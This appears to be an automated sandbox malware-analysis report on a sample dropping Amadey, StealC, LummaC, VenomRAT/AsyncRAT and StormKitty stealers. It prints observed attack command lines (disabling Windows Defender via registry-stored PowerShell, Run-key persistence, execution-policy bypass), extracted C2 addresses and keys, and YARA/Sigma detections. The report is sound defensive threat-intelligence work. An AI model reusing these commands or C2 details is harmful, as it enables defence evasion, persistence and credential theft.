whoami.exe (PID: 5828 cmdline: "C:\Windows\system32\whoami.exe" /groups MD5: 801D9A1C1108360B84E60A457D5A773A)

net1.exe (PID: 4748 cmdline: "C:\Windows\system32\net1.exe" start TrustedInstaller MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net1.exe (PID: 1100 cmdline: "C:\Windows\system32\net1.exe" start lsass MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

powershell.exe (PID: 1396 cmdline: powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)} MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 5360 cmdline: "C:\Windows\system32\sc.exe" qc windefend MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

cmd.exe (PID: 5544 cmdline: "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

whoami.exe (PID: 2608 cmdline: "C:\Windows\system32\whoami.exe" /groups MD5: 801D9A1C1108360B84E60A457D5A773A)

net1.exe (PID: 2604 cmdline: "C:\Windows\system32\net1.exe" stop windefend MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

sc.exe (PID: 7196 cmdline: "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

cmd.exe (PID: 7412 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7452 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 7476 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

findstr.exe (PID: 7484 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7528 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

75f24a4b40.exe (PID: 1264 cmdline: "C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe" MD5: 28CD41E552164EFDF6EAF4C5F00B7821)

9e4b3ff3c2.exe (PID: 408 cmdline: "C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe" MD5: 319888DF2E3F79F5DD0A3CDBFCCDDC03)

ae44c30d83.exe (PID: 5016 cmdline: "C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe" MD5: 965DF7E678A228FEA2B2966AD816C837)

taskkill.exe (PID: 7316 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

75f24a4b40.exe (PID: 5036 cmdline: "C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe" MD5: 28CD41E552164EFDF6EAF4C5F00B7821)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Cameleon, StormKitty	PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.	No Attribution	https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}

Threatname: LummaC

{"C2 url": ["se-blurry.biz", "covery-mover.biz", "zinc-sneark.biz", "impend-differ.biz", "formy-spill.biz", "dwell-exclaim.biz", "dare-curbys.biz", "atten-supporse.biz", "print-vexer.biz"], "Build id": "LOGS11--LiveTraffic"}

Threatname: VenomRAT

{"Server": "205.209.109.10", "Ports": "4449,7723", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.3", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "JrMOaJuxfZSKWpOLEGsB7P6ZlsENcx9t", "Mutex": "clgbfqzkkypxjps", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "H8FZjwfsbU+5QbalSNIQizpt1/rxF12H2U1U1U/ci6pnIjtgaUd68ZmpG5YOHKSodrWO/I7aiI0kwcJLPl+WmJpFAwqVu6ezRvLKXOEkudirmoqf32/ZBIgjugwr0jhfKmfgQMaVoblGsKmex14sg23sB5qlC/oX9PNzV0hkZqE=", "BDOS": "null"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Threatname: AsyncRAT

{"Server": "205.209.109.10", "Ports": "4449,7723", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.3", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "JrMOaJuxfZSKWpOLEGsB7P6ZlsENcx9t", "Mutex": "clgbfqzkkypxjps", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "H8FZjwfsbU+5QbalSNIQizpt1/rxF12H2U1U1U/ci6pnIjtgaUd68ZmpG5YOHKSodrWO/I7aiI0kwcJLPl+WmJpFAwqVu6ezRvLKXOEkudirmoqf32/ZBIgjugwr0jhfKmfgQMaVoblGsKmex14sg23sB5qlC/oX9PNzV0hkZqE=", "BDOS": "null", "External_config_on_Pastebin": "false"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\ClientAny.exe	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
C:\Users\user\AppData\Local\Temp\ClientAny.exe	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xaf2e:$q1: Select * from Win32_CacheMemory 0xaf6e:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xafbc:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xb00a:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Memory Dumps

Source	Rule	Description	Author	Strings
0000001B.00000002.3084330655.0000000000751000.00000040.00000001.01000000.00000012.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x96fb5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x97027:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x970b1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x97143:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x971ad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x9721f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x972b5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x97345:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000002.00000002.2117074619.0000000000281000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000007.00000002.3299025371.00000000003B2000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000016.00000000.2943358475.0000000000902000.00000002.00000001.01000000.00000011.sdmp	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
00000030.00000002.3299078255.00000000006D9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000003.2801862363.0000000004A70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000001B.00000003.2993639198.0000000004B90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001B.00000002.3089860517.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000007.00000002.3710027812.0000000008EC0000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3710027812.0000000008EC0000.00000004.10000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x125571:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000007.00000002.3710027812.0000000008EC0000.00000004.10000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x12b80b:$s1: \VPN\NordVPN 0x12b7f1:$s2: \VPN\OpenVPN 0x12b7d3:$s3: \VPN\ProtonVPN
00000030.00000002.3299078255.000000000073C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x1a1bc:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000030.00000003.3140498967.000000000074C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2117381478.0000000000281000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: H3tyh96.exe PID: 6728	JoeSecurity_DiscordRecon	Yara detected Discord Recon	Joe Security
Process Memory Space: H3tyh96.exe PID: 6728	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
Process Memory Space: H3tyh96.exe PID: 6728	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: H3tyh96.exe PID: 6728	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: H3tyh96.exe PID: 6728	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
Process Memory Space: H3tyh96.exe PID: 6728	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: H3tyh96.exe PID: 6728	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x369e57:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: 75f24a4b40.exe PID: 1264	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 75f24a4b40.exe PID: 1264	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 75f24a4b40.exe PID: 1264	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: powershell.exe PID: 6976	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: powershell.exe PID: 2828	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: ClientAny.exe PID: 7160	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
Process Memory Space: 9e4b3ff3c2.exe PID: 408	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 9e4b3ff3c2.exe PID: 408	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: powershell.exe PID: 2304	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 75f24a4b40.exe PID: 5036	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 75f24a4b40.exe PID: 5036	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 75f24a4b40.exe PID: 5036	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: ae44c30d83.exe PID: 5016	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
Click to see the 38 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
22.0.ClientAny.exe.900000.0.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
22.0.ClientAny.exe.900000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xaf2e:$q1: Select * from Win32_CacheMemory 0xaf6e:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xafbc:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xb00a:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
7.2.H3tyh96.exe.3b0000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.H3tyh96.exe.3b0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xfa60:$q1: Select * from Win32_CacheMemory 0xfaa0:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xfaee:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xfb3c:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
7.2.H3tyh96.exe.8ec0000.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.H3tyh96.exe.8ec0000.8.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x123771:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
7.2.H3tyh96.exe.8ec0000.8.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x129a0b:$s1: \VPN\NordVPN 0x1299f1:$s2: \VPN\OpenVPN 0x1299d3:$s3: \VPN\ProtonVPN
7.2.H3tyh96.exe.8ec0000.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.H3tyh96.exe.8ec0000.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x125571:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
7.2.H3tyh96.exe.8ec0000.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x12b80b:$s1: \VPN\NordVPN 0x12b7f1:$s2: \VPN\OpenVPN 0x12b7d3:$s3: \VPN\ProtonVPN
7.2.H3tyh96.exe.9b90000.16.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
7.2.H3tyh96.exe.9b90000.16.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.H3tyh96.exe.9b90000.16.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
7.2.H3tyh96.exe.9b90000.16.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x951b5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x95227:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x952b1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x95343:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x953ad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x9541f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x954b5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x95545:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.H3tyh96.exe.9b90000.16.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
7.2.H3tyh96.exe.9b90000.16.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.H3tyh96.exe.9b90000.16.raw.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
7.2.H3tyh96.exe.9b90000.16.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x96fb5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x97027:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x970b1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x97143:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x971ad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x9721f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x972b5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x97345:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.file.exe.380000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.skotes.exe.280000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
3.2.skotes.exe.280000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
6.2.skotes.exe.280000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 17 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 1708, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\75f24a4b40.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\ClientAny.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\ClientAny.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\ClientAny.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1856, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\ClientAny.exe"' , ProcessId: 2928, ProcessName: powershell.exe

Sigma detected: Suspicious Windows Service Tampering

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: "C:\Windows\system32\net1.exe" stop windefend, CommandLine: "C:\Windows\system32\net1.exe" stop windefend, CommandLine|base64offset|contains: ), Image: C:\Windows\SysWOW64\net1.exe, NewProcessName: C:\Windows\SysWOW64\net1.exe, OriginalFileName: C:\Windows\SysWOW64\net1.exe, ParentCommandLine: powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2304, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\net1.exe" stop windefend, ProcessId: 3140, ProcessName: net1.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 1708, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\75f24a4b40.exe

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

